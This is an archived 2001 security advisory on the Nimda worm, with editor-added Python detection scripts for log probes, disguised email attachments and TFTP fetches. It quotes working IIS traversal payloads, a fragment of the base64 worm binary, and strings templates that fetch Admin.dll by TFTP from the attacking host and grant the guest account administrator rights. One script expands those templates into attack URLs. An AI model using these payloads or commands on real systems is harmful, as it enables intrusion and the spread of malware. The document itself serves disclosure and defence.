FYI. I'm sending more data that I've gotten about Nimda.
---------- Forwarded message ----------
Date: Tue, 18 Sep 2001 14:30:06 -0700
From: "Kohlenberg, Toby" <toby.kohlenberg@private>
To: "'toby@private'" <toby@private>
Subject: FW: NIMDA UPDATE 3:28 EDT
-----Original Message-----
From: Vicki Irwin [mailto:vicki@private]
Sent: Tuesday, September 18, 2001 1:15 PM
To: intrusions@private
Subject: NIMDA UPDATE 3:28 EDT
We are having problems posting this to the site, so we
decided to send it out to the list for now.
New IIS "Concept Virus" Worm: NIMDA Propagating Quickly
----------------------------------------------------
UPDATE SUMMARY: A new worm that has been named "Nimda" is
propagating with unprecedented speed across the Internet. The worm
appears to have at least four distinct propagation mechanisms.
****INFORMATION IS PRELIMINARY****
(1) An IIS vulnerability propagation mechanism where the worm
attempts to exploit a large number of IIS vulnerabilities to gain
control of a victim IIS server. Once in control, the worm uses tftp
to fetch its code in a file called Admin.dll from the attacking server.
(2) The worm harvests email addresses from the address book and
potentially the web browser history and sends itself to all addresses
as an attachment called readme.exe. Note that the worm may spoof
the source address on the emails, some have even been received at
incidents.org with source addresses of codered@private and
webmaster@private. Other reports indicate that the
spoofed source address of staff@private has also been seen.
It is possible that someone is spoofing these emails intentionally,
so that people will trust the source addresses as they are security
sites.
(3) When a web server is infected, the worm downloads a binary
encoded as a wav file to each client that connects to the server.
The wav file is called readme.eml. Microsoft Internet Explorer will
automatically execute the malicious file.
(4) The worm is network aware and propagates via open shares. It
will propagate to shares that are accessible to username guest
with no password.
The worm appears to prefer to target its neighbors, Code Red II
style, when scanning for vulnerable IIS servers. This can cause
considerable activity on local networks that have several
infected machines.
One class B site has reported their hourly port 80 probe statistics
to us, which are included below. Note how fast the numbers are climbing.
Hour    # Bogus Port 80    # Unique Src
(EDT)   Probes                Addresses
-----   ---------------    ------------
00                53773            7152
01                54242            7221
02                52284            7329
03                59353            7314
04               140291            7492
05               100716            7492
06                53492            7263
07                54392            7227
08                54800            7433
09               113276           24396
10               330131           44576
11               369874           45368
12               399321           44430
-------------------------------------------------------
Many people are reporting this morning that a flood of IIS attacks
is hitting their webservers. A short example trace, captured in an
Apache server log, is below:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
Evidently, a new worm is the source of the activity. Once the
worm gains access to a vulnerable IIS webserver, it uses tftp to
fetch a binary called Admin.dll from the infecting host.
An example packet capture of the tftp request is below.
-----------------
09/18-15:18:23.706570 vulnerable:4184 -> attacker:69
UDP TTL:127 TOS:0x0 ID:33619 IpLen:20 DgmLen:46
Len: 26
00 01 41 64 6D 69 6E 2E 64 6C 6C 00 6F 63 74 65 ..Admin.dll.octe
74 00 t.
------------------
Some interesting strings embedded in the Admin.dll binary include
(a more complete list is at the end of this report):
---------------
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
net
-----------------
Also, connecting to an infected webserver using a web
browser results in an attempt to download an executable called
readme.eml. Reports indicate that IE5 will automatically
execute the program, which appears to be mime encoded as a
wav file. The worm forces readme.eml to be sent to each client
that accesses any page on the infected webserver.
The header from readme.eml is below:
-----------------------
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAM5k1DIAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
AAAABAAAAAAAAAAAEAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
AACEgQAAUAAAAADgAACIHgAAAAAAAAAAAAAAAAAAAAAAAAAAAQA4CgAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIQBAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAudGV4dAAAAFZlAAAAEAAAAHAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAq
(more worm code follows) ...
--------------------------------------
Other reports indicate that the worm will email itself to addresses in the
victim machine's address book as an attachment called readme.exe. Further,
the worm appears to be harvesting email addresses from cached web pages.
An example of the subject line of an email carrying the malicious readme.exe
program is below:
-------------
From: infected <infected@private>
Subject:
Øòdesktopdesktopsamplesampledesktopsampledesktopsamplesampledesktop
desktopdesktopdesktopsampledesktopdesktopsampledesktopdesktopdesktop
sampledesktopdesktopsampledesktopsampledesktopsampledesktopsampl
To: recipient <recipient@private>
----------------
The worm is also said to propagate via open network shares or
shares that allow connections via the username guest with no password.
Strings output from readme.exe is below. Notice that the strings contain
the IIS attacks seen in the apache trace, and reference the readme.eml
file which is launched via JavaScript. Also references to Admin.dll are
included. Some reports indicate that several variants (three or more)
of Admin.dll are currently circulating.
All files are currently under analysis. This information is preliminary.
More information will be posted as soon as it becomes available.
Tom Liston has posted some preliminary analysis here:
http://www.incidents.org/archives/intrusions/msg01765.html
Links to AV vendor sites on the topic are here:
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
NAI
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
F-Secure
http://www.f-secure.com/v-descs/nimda.shtml
Symantec
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@private
Interesting readme.exe strings output is below. Note that
the strings output from readme.exe and Admin.dll are identical
in the files we have gathered so far:
[xxx@xxx xxx]# strings Admin.dll >afoo
[xxx@xxx xxx]# strings readme.exe >bfoo
[xxx@xxx xxx]# diff afoo bfoo
[xxx@xxx xxx]#
Interesting readme.exe/Admin.dll strings output
---------------------------------------
strncpy
memset
strcpy
strlen
strtok
memcpy
strchr
strcat
rand
strcmp
_strlwr
strncat
srand
free
sprintf
malloc
atoi
strstr
strrchr
MSVCRT.dll
_initterm
_adjust_fdiv
GetCurrentThreadId
CloseHandle
WriteFile
SetFilePointer
CreateFileA
MoveFileExA
ReadFile
SetFileAttributesA
FindClose
FindNextFileA
FindFirstFileA
WriteProcessMemory
OpenProcess
GetCurrentProcessId
lstrcmpiA
HeapCompact
Sleep
GetTickCount
SetThreadPriority
GetCurrentThread
CreateMutexA
lstrcpyA
GetComputerNameA
LocalFree
lstrlenA
LocalAlloc
CreateThread
ReleaseMutex
WaitForSingleObject
GetDriveTypeA
GetLogicalDrives
GetFileSize
CopyFileA
GetFileAttributesA
SetFileTime
GetFileTime
EndUpdateResourceA
UpdateResourceA
SizeofResource
LockResource
LoadResource
FindResourceA
FreeLibrary
BeginUpdateResourceA
LoadLibraryExA
DeleteFileA
GetTempFileNameA
CreateProcessA
GetModuleFileNameA
GetCurrentDirectoryA
GetCommandLineA
GetTempPathA
GetSystemDirectoryA
GetWindowsDirectoryA
GetModuleHandleA
GetVersionExA
GetProcAddress
LoadLibraryA
GetSystemTime
ExitProcess
HeapDestroy
GetLastError
HeapCreate
WritePrivateProfileStringA
KERNEL32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumValueA
RegSetValueExA
RegQueryValueA
ADVAPI32.dll
System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld
Image Space Exec Write Copy
Image Space Exec Read/Write
Image Space Exec Read Only
Image Space Executable
Image Space Write Copy
Image Space Read/Write
Image Space Read Only
Image Space No Access
Mapped Space Exec Write Copy
Mapped Space Exec Read/Write
Mapped Space Exec Read Only
Mapped Space Executable
Mapped Space Write Copy
Mapped Space Read/Write
Mapped Space Read Only
Mapped Space No Access
Reserved Space Exec Write Copy
Reserved Space Exec Read/Write
Reserved Space Exec Read Only
Reserved Space Executable
Reserved Space Write Copy
Reserved Space Read/Write
Reserved Space Read Only
Reserved Space No Access
Process Address Space
Exec Write Copy
Exec Read/Write
Exec Read Only
Executable
Write Copy
Read/Write
Read Only
No Access
Image
User PC
Thread Details
ID Thread
Priority Current
Context Switches/sec
Start Address
Thread
Page Faults/sec
Virtual Bytes Peak
Virtual Bytes
Private Bytes
ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold
ioctlsocket
gethostbyname
gethostname
inet_ntoa
inet_addr
ntohl
htonl
ntohs
htons
closesocket
select
sendto
send
recvfrom
recv
bind
connect
socket
__WSAFDIsSet
WSACleanup
WSAStartup
ws2_32.dll
MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL
WNetAddConnection2A
WNetCancelConnection2A
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
MPR.DLL
ShellExecuteA
SHELL32.DLL
RegisterServiceProcess
VirtualFreeEx
VirtualQueryEx
VirtualAllocEx
VirtualProtectEx
CreateRemoteThread
HeapCompact
HeapFree
HeapAlloc
HeapDestroy
HeapCreate
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet
wwwwwp
pwlo
wwww
wwwwwwwwwwx
wwwwwwx
wwwwx
wwwx
lffffff
ffff
ffff
CCCCCC
CCCCCCCCC
NPAD
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
DINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDIN
GXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPA
DDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
DINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
XPADDINGPADDINGXXPADDINGPADDINGX
-----------------------------------------------
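Editor's added example (Python, not part of the advisory above or of the worm): the Apache trace shows the same cmd.exe target reached through several encodings (%255c double-encoding, the %c0%af / %c1%1c / %c1%9c overlong UTF-8 forms, the %%35%63 family). This script canonicalizes those encodings the way the vulnerable IIS decoder did and classifies each request, so a log review catches every variant rather than one pattern. The sample lines are copied from the trace in the message plus one constructed benign request; the decoder is the editor's reconstruction of the decoding behaviour the probes rely on, not IIS code.

```python
"""Normalize and classify IIS probe requests of the kind seen in the Apache trace.

Added example, not from the advisory or the worm.  The decoder imitates the two
IIS decoding behaviours the probes depend on:
  * double percent-decoding:            %255c -> %5c -> '\\'
  * lenient 2-byte UTF-8 decoding:      %c0%af -> '/', %c1%1c -> '\\'
so every encoding variant canonicalizes to the same path.
"""
import re

# Constructed sample: request lines taken from the trace in the message, plus a
# benign request for contrast.
SAMPLE_LOG = r'''
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
'''

_PCT = re.compile(rb'%([0-9A-Fa-f]{2})')
_REQ = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# root.exe is the cmd.exe copy that Code Red II left behind in /scripts and /MSADC.
TARGET_BINARIES = ('cmd.exe', 'root.exe')


def pct_decode(data: bytes) -> bytes:
    """One pass of %XX decoding.  A '%' not followed by two hex digits is kept,
    which is why '%%35%63' becomes '%5c' after one pass and '\\' after two."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def lenient_utf8(data: bytes) -> bytes:
    """Decode 2-byte UTF-8 lead bytes (0xC0-0xDF) without rejecting overlong forms
    and without checking that the second byte is a continuation byte:
    0xC0 0xAF -> '/', 0xC0 0x2F -> '/', 0xC1 0x1C -> '\\'.  A strict decoder
    rejects all of these.  Non-ASCII results are replaced by '?'."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            out.append(cp if cp < 0x80 else 0x3F)
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def canonical_path(raw_path: str) -> str:
    """Two rounds of (percent-decode, lenient UTF-8), mirroring the IIS
    double-decoding flaw, then backslash treated as a path separator."""
    data = raw_path.encode('latin-1')
    for _ in range(2):
        data = lenient_utf8(pct_decode(data))
    return data.decode('latin-1').replace('\\', '/')


def classify(line: str):
    """Verdict dict for one combined-log-format line, or None when the request
    does not resolve to cmd.exe or root.exe."""
    m = _REQ.search(line)
    if not m:
        return None
    raw_path, _, query = m.group('target').partition('?')
    path = canonical_path(raw_path)
    segments = [s for s in path.split('/') if s]
    binary = segments[-1].lower() if segments else ''
    if binary not in TARGET_BINARIES:
        return None
    return {
        'raw': raw_path,
        'canonical': path,
        'binary': binary,
        'traversal': '..' in segments,
        'double_decode': '%25' in raw_path.lower() or '%%' in raw_path,
        'overlong_utf8': re.search(r'%c[01]%', raw_path, re.I) is not None,
        'command': query.replace('+', ' '),
        'status': int(m.group('status')),
    }


def scan(log_text: str) -> list:
    """All probe verdicts in a block of log text, in file order."""
    return [v for v in map(classify, log_text.splitlines()) if v]


if __name__ == '__main__':
    for v in scan(SAMPLE_LOG):
        flags = [k for k in ('traversal', 'double_decode', 'overlong_utf8') if v[k]]
        print('%-3d %-9s %-42s %s' % (v['status'], v['binary'], v['canonical'], ','.join(flags)))
```

Run it against a real access log with scan(open(path).read()); every verdict carries the canonical path, so a single rule on the canonical form replaces one signature per encoding.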
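Editor's added example (Python, not from the advisory or the worm) for the readme.eml mechanism: the header printed above declares the executable as audio/x-wav, names it readme.exe, and a zero-size iframe references it by Content-ID. This parser walks such a message and flags the combination of declared audio type, MZ magic in the decoded payload, and an iframe pointing at that Content-ID. SAMPLE_EML is reconstructed from the header in the message with the blank lines that the archive dropped restored and only the first three base64 lines shown; the fourth base64 line onward is omitted, so the decoded body is just a prefix of the file.

```python
"""Inspect a readme.eml of the kind described above: an executable disguised as
audio/x-wav and auto-loaded through <iframe src=cid:...>.

Added example, not from the advisory.  SAMPLE_EML is reconstructed from the
header quoted in the message (blank lines restored; base64 truncated).
"""
import email
import re

SAMPLE_EML = '''\
MIME-Version: 1.0
Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
    boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
    charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
    name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO

--====_ABC1234567890DEF_====--
'''

# File signatures worth distinguishing here: what the part claims vs. what it is.
MAGIC = (
    (b'MZ', 'DOS/PE executable'),
    (b'RIFF', 'RIFF container (a real .wav starts this way)'),
)


def analyze_eml(raw: str) -> dict:
    """Walk every leaf part; collect iframe cid: references from HTML parts and
    describe every non-HTML part by declared type, filename, Content-ID and magic."""
    msg = email.message_from_string(raw)
    iframe_cids, parts = [], []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b''   # undoes base64 / quoted-printable
        if ctype == 'text/html':
            html = payload.decode(part.get_content_charset() or 'latin-1', 'replace')
            iframe_cids += re.findall(r'<iframe[^>]*\bsrc=["\']?cid:([^\s"\'>]+)', html, re.I)
            continue
        parts.append({
            'content_type': ctype,
            'name': part.get_filename() or '',          # falls back to Content-Type name=
            'content_id': (part.get('Content-ID') or '').strip('<>'),
            'magic': next((d for sig, d in MAGIC if payload.startswith(sig)), 'unknown'),
            'declared_audio': ctype.startswith('audio/'),
            'is_executable': payload.startswith(b'MZ'),
        })
    for p in parts:
        p['referenced_by_iframe'] = p['content_id'] in iframe_cids
    return {'iframe_cids': iframe_cids, 'parts': parts}


def is_nimda_style(report: dict) -> bool:
    """True when an MZ executable is declared as audio and pulled in by an iframe."""
    return any(p['declared_audio'] and p['is_executable'] and p['referenced_by_iframe']
               for p in report['parts'])


if __name__ == '__main__':
    report = analyze_eml(SAMPLE_EML)
    for p in report['parts']:
        print(p)
    print('nimda-style:', is_nimda_style(report))
```

The decision rests on the decoded bytes, not on the declared type or the filename; a gateway that only checks Content-Type sees audio, and one that only checks the extension never sees readme.exe because the iframe loads it by Content-ID.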
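Editor's added example (Python, a reconstruction rather than worm code) for the second stage of the IIS path: the strings output contains C printf templates in which "%s" takes the attacking host's address and "%%20" is a literal "%20", i.e. a URL-encoded space that IIS decodes before handing "/c ..." to cmd.exe. The block expands those templates with an assumed attacker address and parses the TFTP read request from the packet capture above (opcode, NUL-terminated filename, NUL-terminated mode). The advisory does not state the worm's exact command ordering; only the expansion and the parse are shown.

```python
"""Stage two of the IIS propagation path: the URL templates expanded, and the
TFTP read request the victim then sends to the attacker.

Added example; not worm code.  Templates and packet bytes are copied from the
strings output and the capture in the message; the attacker address is assumed.
"""
import struct

# Templates exactly as they appear in the strings output.  '%s' is the attacking
# host, '%%' yields a literal '%', so '%%20' goes on the wire as '%20'.
NET_USE_FMT = r'net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"'
TFTP_FMT = r'tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20'
CMD_SUFFIX = '/winnt/system32/cmd.exe?/c+'      # also from the strings output

# UDP payload of the captured request to port 69 (hex bytes from the message).
CAPTURED_RRQ = bytes.fromhex('00 01 41 64 6D 69 6E 2E 64 6C 6C 00 6F 63 74 65 74 00')

TFTP_OPCODES = {1: 'RRQ', 2: 'WRQ', 3: 'DATA', 4: 'ACK', 5: 'ERROR'}


def build_stage2_urls(attacker_ip: str, traversal: str = '/scripts/..%255c..') -> list:
    """Paths the two templates produce once a working cmd.exe route is known."""
    return [traversal + CMD_SUFFIX + (fmt % attacker_ip) for fmt in (NET_USE_FMT, TFTP_FMT)]


def parse_tftp_request(payload: bytes) -> dict:
    """Parse a TFTP RRQ/WRQ: 2-byte big-endian opcode, NUL-terminated filename,
    NUL-terminated transfer mode.  Other opcodes and unterminated fields raise."""
    if len(payload) < 4:
        raise ValueError('too short for a TFTP request')
    (opcode,) = struct.unpack('!H', payload[:2])
    if opcode not in (1, 2):
        raise ValueError('opcode %d is not a read/write request' % opcode)
    fields = payload[2:].split(b'\x00')
    if len(fields) < 3 or fields[-1] != b'':
        raise ValueError('missing NUL terminator')
    return {
        'opcode': TFTP_OPCODES[opcode],
        'filename': fields[0].decode('ascii', 'replace'),
        'mode': fields[1].decode('ascii', 'replace').lower(),
    }


def is_nimda_fetch(req: dict) -> bool:
    """Detection predicate: an outbound RRQ for admin.dll, in any letter case."""
    return req['opcode'] == 'RRQ' and req['filename'].lower() == 'admin.dll'


if __name__ == '__main__':
    for url in build_stage2_urls('192.0.2.10'):       # assumed attacker address
        print('GET ' + url + ' HTTP/1.0')
    req = parse_tftp_request(CAPTURED_RRQ)
    print(req, 'nimda fetch' if is_nimda_fetch(req) else 'other')
```

The parse explains the capture: DgmLen 46 is 20 bytes of IP header, 8 of UDP and the 18-byte request, and the filename field is why a UDP/69 rule keyed on "Admin.dll" in the RRQ is a useful egress check on a web server that should never be a TFTP client.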
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:07 PDT